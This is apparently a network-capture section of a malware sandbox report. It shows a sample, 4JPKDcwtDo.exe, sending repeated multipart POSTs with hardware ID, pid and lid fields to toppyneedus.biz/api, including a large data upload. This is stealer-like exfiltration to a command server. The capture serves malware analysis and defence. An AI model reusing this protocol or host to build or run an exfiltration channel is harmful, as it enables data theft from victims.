                                                                                                  Data Ascii: NXnJXbJIfgldTwzF6KQggt47ZaUiaYPPKJ2dVLVq8opyWcVRoUhkWmNBDungtXae7nY0o3Qi1rZ/nZ1AtWrysHJPwWS0XmELJgwF3a/qIKOhZya6OybKyHGFg2a1OaSYZVrUQLpDeXUoFFaZveAyz/41OpV2adq2aeSDGONy6s07GdAL7w8vSHpeBMj5sSej31IzoD853OE+ndQY+nLqpjVQxVCmWWVbbww9ha+qIMWhQCakNi7N53z6jFLyIrW
                                                                                                  2025-01-26 14:48:01 UTC1369INData Raw: 41 75 69 52 47 52 4e 5a 56 6c 4e 32 76 6d 78 64 70 71 74 66 54 53 6e 4e 47 6e 6b 75 48 48 46 32 67 43 31 42 37 47 52 65 31 37 55 57 76 70 76 59 30 64 72 51 41 50 4d 72 2f 77 67 6d 36 45 74 64 75 52 34 4c 63 71 32 61 59 33 49 41 36 42 68 35 63 38 6e 52 6f 78 53 39 31 6b 6f 45 7a 6f 43 51 74 6d 76 36 69 44 61 34 6d 63 33 72 44 73 2f 32 4c 45 50 34 35 74 56 2b 6e 36 38 6c 48 56 65 30 6c 32 73 41 32 42 49 63 6c 59 38 39 63 53 2b 5a 70 72 37 63 69 4f 4d 47 47 6d 56 74 6a 36 64 77 6d 47 31 65 76 4b 67 4f 78 6e 61 43 2b 38 50 58 55 68 6d 51 67 58 64 2f 76 39 49 76 74 74 50 5a 34 59 2f 50 4a 6e 43 4e 73 32 4c 55 2f 67 2b 38 74 45 31 58 34 49 54 35 77 45 6f 54 33 6b 4d 57 70 75 39 36 54 58 4f 74 69 56 33 74 58 59 77 6d 2b 42 78 68 63 67 57 74 53 44 79 78 7a 55 65
                                                                                                  Data Ascii: AuiRGRNZVlN2vmxdpqtfTSnNGnkuHHF2gC1B7GRe17UWvpvY0drQAPMr/wgm6EtduR4Lcq2aY3IA6Bh5c8nRoxS91koEzoCQtmv6iDa4mc3rDs/2LEP45tV+n68lHVe0l2sA2BIclY89cS+Zpr7ciOMGGmVtj6dwmG1evKgOxnaC+8PXUhmQgXd/v9IvttPZ4Y/PJnCNs2LU/g+8tE1X4IT5wEoT3kMWpu96TXOtiV3tXYwm+BxhcgWtSDyxzUe
                                                                                                  2025-01-26 14:48:01 UTC1369INData Raw: 45 6f 57 53 67 55 51 6f 7a 68 76 32 47 65 37 33 59 33 75 44 34 71 7a 66 56 32 34 36 52 39 2b 44 2b 33 6b 58 4a 6e 2f 47 71 39 58 32 56 45 62 77 34 69 7a 50 6d 78 58 71 50 57 5a 43 4b 36 65 67 2f 59 34 44 4b 64 31 42 6a 74 63 75 72 66 56 46 50 53 52 72 68 49 4b 6d 74 76 57 67 47 4c 6f 66 4a 6b 33 62 6b 31 41 4b 63 31 4c 4e 58 78 63 2f 79 51 53 50 67 39 74 64 31 56 58 74 52 49 39 77 45 6f 52 79 67 55 51 73 72 6c 6f 6d 32 53 35 6a 6b 69 73 44 39 70 6c 62 59 2f 6e 63 49 59 39 44 69 69 6b 6e 70 65 6a 6b 32 35 51 53 68 55 4a 6c 56 43 33 61 2f 71 4d 39 4f 68 5a 32 58 79 65 47 37 59 35 43 50 62 6d 55 37 32 64 59 79 68 57 45 76 46 57 37 51 4e 57 55 5a 73 57 68 66 49 2f 37 56 65 6f 38 78 6e 49 72 6f 37 61 2b 72 67 4d 74 32 55 58 37 56 38 38 6f 63 31 41 59 4a 6d 70
                                                                                                  Data Ascii: EoWSgUQozhv2Ge73Y3uD4qzfV246R9+D+3kXJn/Gq9X2VEbw4izPmxXqPWZCK6eg/Y4DKd1BjtcurfVFPSRrhIKmtvWgGLofJk3bk1AKc1LNXxc/yQSPg9td1VXtRI9wEoRygUQsrlom2S5jkisD9plbY/ncIY9Diiknpejk25QShUJlVC3a/qM9OhZ2XyeG7Y5CPbmU72dYyhWEvFW7QNWUZsWhfI/7Veo8xnIro7a+rgMt2UX7V88oc1AYJmp


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  2192.168.2.749702172.67.149.664437120C:\Users\user\Desktop\4JPKDcwtDo.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-26 14:48:02 UTC276OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: multipart/form-data; boundary=8WECHI4R4Q2XC
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 12809
                                                                                                  Host: toppyneedus.biz
                                                                                                  2025-01-26 14:48:02 UTC12809OUTData Raw: 2d 2d 38 57 45 43 48 49 34 52 34 51 32 58 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 31 39 43 36 39 42 31 46 43 30 43 36 46 31 34 36 35 34 46 44 39 41 30 38 38 34 33 37 30 45 0d 0a 2d 2d 38 57 45 43 48 49 34 52 34 51 32 58 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 38 57 45 43 48 49 34 52 34 51 32 58 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 38 57 45 43 48 49 34 52 34 51 32 58 43 0d 0a 43
                                                                                                  Data Ascii: --8WECHI4R4Q2XCContent-Disposition: form-data; name="hwid"F219C69B1FC0C6F14654FD9A0884370E--8WECHI4R4Q2XCContent-Disposition: form-data; name="pid"2--8WECHI4R4Q2XCContent-Disposition: form-data; name="lid"4h5VfH----8WECHI4R4Q2XCC
                                                                                                  2025-01-26 14:48:03 UTC1134INHTTP/1.1 200 OK
                                                                                                  Date: Sun, 26 Jan 2025 14:48:03 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=0pmcfjbbgn5kqgvto68gnd9hap; expires=Thu, 22 May 2025 08:34:41 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=8RZZfkJCj%2FK8tqnKpu1%2F6D1xrncavNqDDgnuB4bOzwb%2BkoATm5pXfum39J5Gwy0dqVt%2BUr5NANzaAcjedzOXLh9d6yP82zA95HoDlbIQBUkHske6%2BKgSzKhUv3bm9%2BAO%2FmU%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 90814d389aa87c82-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1803&min_rtt=1801&rtt_var=681&sent=8&recv=16&lost=0&retrans=0&sent_bytes=2837&recv_bytes=13743&delivery_rate=1601755&cwnd=216&unsent_bytes=0&cid=f557222bd6cc66c9&ts=618&x=0"
                                                                                                  2025-01-26 14:48:03 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                  2025-01-26 14:48:03 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  3192.168.2.749703172.67.149.664437120C:\Users\user\Desktop\4JPKDcwtDo.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-26 14:48:03 UTC280OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: multipart/form-data; boundary=3W3GH7I4IB9Z3GWPK
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 15065
                                                                                                  Host: toppyneedus.biz
                                                                                                  2025-01-26 14:48:03 UTC15065OUTData Raw: 2d 2d 33 57 33 47 48 37 49 34 49 42 39 5a 33 47 57 50 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 31 39 43 36 39 42 31 46 43 30 43 36 46 31 34 36 35 34 46 44 39 41 30 38 38 34 33 37 30 45 0d 0a 2d 2d 33 57 33 47 48 37 49 34 49 42 39 5a 33 47 57 50 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 32 0d 0a 2d 2d 33 57 33 47 48 37 49 34 49 42 39 5a 33 47 57 50 4b 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 33 57 33 47
                                                                                                  Data Ascii: --3W3GH7I4IB9Z3GWPKContent-Disposition: form-data; name="hwid"F219C69B1FC0C6F14654FD9A0884370E--3W3GH7I4IB9Z3GWPKContent-Disposition: form-data; name="pid"2--3W3GH7I4IB9Z3GWPKContent-Disposition: form-data; name="lid"4h5VfH----3W3G
                                                                                                  2025-01-26 14:48:04 UTC1130INHTTP/1.1 200 OK
                                                                                                  Date: Sun, 26 Jan 2025 14:48:04 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=2oljai7g9n7j933qh6mlituov4; expires=Thu, 22 May 2025 08:34:43 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=E4etulM%2B1vtmxUr8wNTOCY4Iun%2BnpB8FEcMUefDTdOUO4PEG%2Bqnt9FdLSleYoosDVbBt4E%2B4O%2BcDgvPjSVP47r8tGinZ1284KCkwn2Py2ITLZ953DWFgZv52BFjLnzTOklM%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 90814d404a9bde98-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1513&min_rtt=1510&rtt_var=572&sent=9&recv=19&lost=0&retrans=0&sent_bytes=2838&recv_bytes=16003&delivery_rate=1901041&cwnd=226&unsent_bytes=0&cid=f47958bb1d4170d9&ts=890&x=0"
                                                                                                  2025-01-26 14:48:04 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                  2025-01-26 14:48:04 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  4192.168.2.749705172.67.149.664437120C:\Users\user\Desktop\4JPKDcwtDo.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-26 14:48:05 UTC274OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: multipart/form-data; boundary=00T4M7OEH02
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 20354
                                                                                                  Host: toppyneedus.biz
                                                                                                  2025-01-26 14:48:05 UTC15331OUTData Raw: 2d 2d 30 30 54 34 4d 37 4f 45 48 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 31 39 43 36 39 42 31 46 43 30 43 36 46 31 34 36 35 34 46 44 39 41 30 38 38 34 33 37 30 45 0d 0a 2d 2d 30 30 54 34 4d 37 4f 45 48 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 33 0d 0a 2d 2d 30 30 54 34 4d 37 4f 45 48 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 30 30 54 34 4d 37 4f 45 48 30 32 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                  Data Ascii: --00T4M7OEH02Content-Disposition: form-data; name="hwid"F219C69B1FC0C6F14654FD9A0884370E--00T4M7OEH02Content-Disposition: form-data; name="pid"3--00T4M7OEH02Content-Disposition: form-data; name="lid"4h5VfH----00T4M7OEH02Content-D
                                                                                                  2025-01-26 14:48:05 UTC5023OUTData Raw: 00 00 00 00 00 00 00 00 00 00 c0 36 d7 17 05 4b db 7e 1a 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 d8 e6 fa a3 60 69 db 4f 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 db 5c 5f 14 2c 6d fb 69 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 60 9b eb 8f 82 a5 6d 3f 0d 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 6c 73 7d 51 b0 b4 ed a7 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 80 6d ae 2f f8 f5 58 32 78 29 1e bc 14 fc db e0 ab e6 03 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00
                                                                                                  Data Ascii: 6K~`iO\_,mi`m?ls}Qm/X2x)
                                                                                                  2025-01-26 14:48:06 UTC1127INHTTP/1.1 200 OK
                                                                                                  Date: Sun, 26 Jan 2025 14:48:06 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=8ahln77e6igloei8mf319ta31a; expires=Thu, 22 May 2025 08:34:44 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=wYJOF2mhW%2BHDNU3YXxFnSaQuGab1LYzKqN1Hp1r7iWTQuqAEbn1PXh%2B3JMYX09XKeShVdNawQXLYSCve7iP6pA%2BCv4SOhGFKKRMQj1Tu4hVfOXg1DjYXKv0GIStGfVZCTBI%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 90814d4a7d8e7cfc-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1982&min_rtt=1979&rtt_var=748&sent=12&recv=25&lost=0&retrans=0&sent_bytes=2837&recv_bytes=21308&delivery_rate=1457813&cwnd=226&unsent_bytes=0&cid=1ef69889f823856e&ts=659&x=0"
                                                                                                  2025-01-26 14:48:06 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                  2025-01-26 14:48:06 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  5192.168.2.749711172.67.149.664437120C:\Users\user\Desktop\4JPKDcwtDo.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-26 14:48:06 UTC273OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: multipart/form-data; boundary=5T15HD77S8T
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 2595
                                                                                                  Host: toppyneedus.biz
                                                                                                  2025-01-26 14:48:06 UTC2595OUTData Raw: 2d 2d 35 54 31 35 48 44 37 37 53 38 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 31 39 43 36 39 42 31 46 43 30 43 36 46 31 34 36 35 34 46 44 39 41 30 38 38 34 33 37 30 45 0d 0a 2d 2d 35 54 31 35 48 44 37 37 53 38 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 35 54 31 35 48 44 37 37 53 38 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 35 54 31 35 48 44 37 37 53 38 54 0d 0a 43 6f 6e 74 65 6e 74 2d 44
                                                                                                  Data Ascii: --5T15HD77S8TContent-Disposition: form-data; name="hwid"F219C69B1FC0C6F14654FD9A0884370E--5T15HD77S8TContent-Disposition: form-data; name="pid"1--5T15HD77S8TContent-Disposition: form-data; name="lid"4h5VfH----5T15HD77S8TContent-D
                                                                                                  2025-01-26 14:48:07 UTC1126INHTTP/1.1 200 OK
                                                                                                  Date: Sun, 26 Jan 2025 14:48:07 GMT
                                                                                                  Content-Type: text/html; charset=UTF-8
                                                                                                  Transfer-Encoding: chunked
                                                                                                  Connection: close
                                                                                                  Set-Cookie: PHPSESSID=ef0rslij4mcjbeg3n31mfmc612; expires=Thu, 22 May 2025 08:34:46 GMT; Max-Age=9999999; path=/
                                                                                                  Expires: Thu, 19 Nov 1981 08:52:00 GMT
                                                                                                  Cache-Control: no-store, no-cache, must-revalidate
                                                                                                  Pragma: no-cache
                                                                                                  X-Frame-Options: DENY
                                                                                                  X-Content-Type-Options: nosniff
                                                                                                  X-XSS-Protection: 1; mode=block
                                                                                                  cf-cache-status: DYNAMIC
                                                                                                  vary: accept-encoding
                                                                                                  Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=y1ALHa4T834c9Am9%2F4yhiDn42V2u0xoUhCS0fuji5b%2B24c4sOkmAJZ%2FI5s9I40sUEbMJgPKLHU5RWjQBZj9VolKMryCd2Z7CGIzUIdGKHi%2Bm5IfZXpEq5vAZsIbQ2WeERfs%3D"}],"group":"cf-nel","max_age":604800}
                                                                                                  NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                                                                  Server: cloudflare
                                                                                                  CF-RAY: 90814d53e97f41a1-EWR
                                                                                                  alt-svc: h3=":443"; ma=86400
                                                                                                  server-timing: cfL4;desc="?proto=TCP&rtt=1596&min_rtt=1586&rtt_var=615&sent=5&recv=8&lost=0&retrans=0&sent_bytes=2839&recv_bytes=3504&delivery_rate=1748502&cwnd=231&unsent_bytes=0&cid=e1bcae55817885d0&ts=513&x=0"
                                                                                                  2025-01-26 14:48:07 UTC20INData Raw: 66 0d 0a 6f 6b 20 38 2e 34 36 2e 31 32 33 2e 31 38 39 0d 0a
                                                                                                  Data Ascii: fok 8.46.123.189
                                                                                                  2025-01-26 14:48:07 UTC5INData Raw: 30 0d 0a 0d 0a
                                                                                                  Data Ascii: 0


                                                                                                  Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                  6192.168.2.749722172.67.149.664437120C:\Users\user\Desktop\4JPKDcwtDo.exe
                                                                                                  TimestampBytes transferredDirectionData
                                                                                                  2025-01-26 14:48:08 UTC273OUTPOST /api HTTP/1.1
                                                                                                  Connection: Keep-Alive
                                                                                                  Content-Type: multipart/form-data; boundary=GKFMC2XGC
                                                                                                  User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/119.0.0.0 Safari/537.36
                                                                                                  Content-Length: 557249
                                                                                                  Host: toppyneedus.biz
                                                                                                  2025-01-26 14:48:08 UTC15331OUTData Raw: 2d 2d 47 4b 46 4d 43 32 58 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 68 77 69 64 22 0d 0a 0d 0a 46 32 31 39 43 36 39 42 31 46 43 30 43 36 46 31 34 36 35 34 46 44 39 41 30 38 38 34 33 37 30 45 0d 0a 2d 2d 47 4b 46 4d 43 32 58 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 70 69 64 22 0d 0a 0d 0a 31 0d 0a 2d 2d 47 4b 46 4d 43 32 58 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 6c 69 64 22 0d 0a 0d 0a 34 68 35 56 66 48 2d 2d 0d 0a 2d 2d 47 4b 46 4d 43 32 58 47 43 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69
                                                                                                  Data Ascii: --GKFMC2XGCContent-Disposition: form-data; name="hwid"F219C69B1FC0C6F14654FD9A0884370E--GKFMC2XGCContent-Disposition: form-data; name="pid"1--GKFMC2XGCContent-Disposition: form-data; name="lid"4h5VfH----GKFMC2XGCContent-Dispositi
                                                                                                  2025-01-26 14:48:08 UTC15331OUTData Raw: 94 1a 4f 5a 33 91 52 73 4a 56 73 08 96 e9 29 45 7c 02 6f a6 b4 0c 53 7c 1e b3 48 4e e3 b6 04 ba ca b3 b9 8e 78 0e 71 4d 7e 78 c9 b9 e0 97 ed c3 6c 12 91 da 81 a2 08 6c 49 af 7d 0b 86 0d 76 15 a6 47 19 61 61 bf 05 68 83 1b bb 64 a2 a0 5c db 2f 9c 07 92 97 9d 97 26 3f ba ed f8 28 96 7c a1 a9 72 aa d4 ae 08 66 9e cb cc 28 83 3a f9 52 c0 95 85 7e ef 95 eb 7c e6 9e 26 54 c1 ad 83 1b 36 9a 29 35 1e b5 b1 74 3f 39 d4 ba 28 ef cc 70 f8 75 40 8b a6 55 27 ad ec 49 da 39 b2 65 59 de b2 1b f6 03 5f 95 2c 08 b9 87 29 0f e2 04 ab da 95 41 b4 80 e6 a7 9d 81 80 c4 d8 60 99 ed ef 6a 94 56 14 65 f1 71 f5 8a b2 46 be 0d 12 52 1c 40 da f4 30 36 a5 7d 41 25 cf b5 02 5f 2f 4f 79 12 d8 a6 0f 08 85 77 6e 8b 3c 84 99 46 7d b7 03 e0 c8 4b c4 67 c9 d6 2a 8c ee 65 73 38 b6 0f e6 08
                                                                                                  Data Ascii: OZ3RsJVs)E|oS|HNxqM~xllI}vGaahd\/&?(|rf(:R~|&T6)5t?9(pu@U'I9eY_,)A`jVeqFR@06}A%_/Oywn<F}Kg*es8
                                                                                                  2025-01-26 14:48:08 UTC15331OUTData Raw: f5 6b e6 bd 2d 29 05 95 9c 97 4c b7 8f ae 75 83 78 5d ea 8f 35 43 ee b9 01 fa c5 1f a6 04 77 37 de 17 f5 b8 d2 ad 9e a5 5f 3c 9c 7c 97 5e 39 b0 9d fb e3 01 df c7 07 ad cb 3b 95 a3 6b 7e 05 4f 1f be 94 1a e6 3c 5d 7d f9 f4 e6 af b7 aa 97 9b 57 7b ea 36 d9 ab b5 db 6e 2f e2 1f aa cd 49 83 61 ef 81 82 af 1f af 39 a6 a5 1b 8e 47 ae 4e dc b7 5a 67 2e c5 92 0d c9 dc 7e 6c 22 c1 69 21 b3 ab 54 51 c2 ff 73 ac cf 32 4d b5 30 36 c5 43 36 f9 d1 ea 81 5a b7 8c aa 87 39 4b 46 f4 73 68 5e 4d d0 c3 24 94 ae c9 5c 4d dc 8f 50 db f0 de 7b 7f 3d a6 1f 38 04 57 07 b6 38 6a f7 04 fb a3 81 db 65 ef 88 58 1f ba 34 7a da 0d 62 f2 91 8d 0f 86 89 60 53 ff 91 f0 b9 8b 95 9b 8f 6d 96 d9 f8 00 32 cd 2a 8b e0 08 2d a2 de 6f 77 8f 91 e4 0e 52 e4 ee 06 47 64 7f 55 36 72 f5 aa 68 b3 ef
                                                                                                  Data Ascii: k-)Lux]5Cw7_<|^9;k~O<]}W{6n/Ia9GNZg.~l"i!TQs2M06C6Z9KFsh^M$\MP{=8W8jeX4zb`Sm2*-owRGdU6rh
                                                                                                  2025-01-26 14:48:08 UTC15331OUTData Raw: 4e be 52 b7 05 eb 7a 0e f2 07 b3 a5 54 ab b4 9f ef 93 36 6b 12 3c d7 99 16 09 c3 11 9e 7c 28 4e f7 6f 21 5f 6c f1 6d 96 57 4a 73 97 af e4 bd 2f d7 30 8b 4f d5 13 1e 90 b7 d7 b0 0b 5c 25 3d d4 09 95 dd 5e 1c 98 10 ff de f1 d3 c7 56 21 7d b5 46 e8 8a 98 ba 51 7a 9a a0 eb 77 83 f6 1f 9d 37 67 d3 74 71 47 15 fb 5c 41 aa 54 ee b0 a7 7a ef 9c d1 8e 51 d1 9b 5b 70 e7 0b 8f b1 3b 82 27 9f 9d 05 fe 70 98 27 cf cf aa 2c 21 46 97 bc 51 98 e1 6c 91 06 04 49 1c 2d 93 f3 86 0e 2f be 05 ea d0 f2 ed a9 f2 e2 f4 dc 7e 3b 72 bf 0b bf a9 fb 54 5e c5 25 85 bb 43 1a b7 d3 cd 3e 12 73 79 97 0f 47 e3 f2 b5 1a dc 7e 5e f0 2e cf e7 11 b4 34 c1 48 0b 55 6c d6 ac 8c bc 23 2e 9b d9 b9 4c fd f0 e6 7c bf 6f 94 a3 4f 10 67 6a 95 ff 09 77 e0 03 0d 4c 47 67 1e 66 38 02 5f 33 65 02 2c 32
                                                                                                  Data Ascii: NRzT6k<|(No!_lmWJs/0O\%=^V!}FQzw7gtqG\ATzQ[p;'p',!FQlI-/~;rT^%C>syG~^.4HUl#.L|oOgjwLGgf8_3e,2
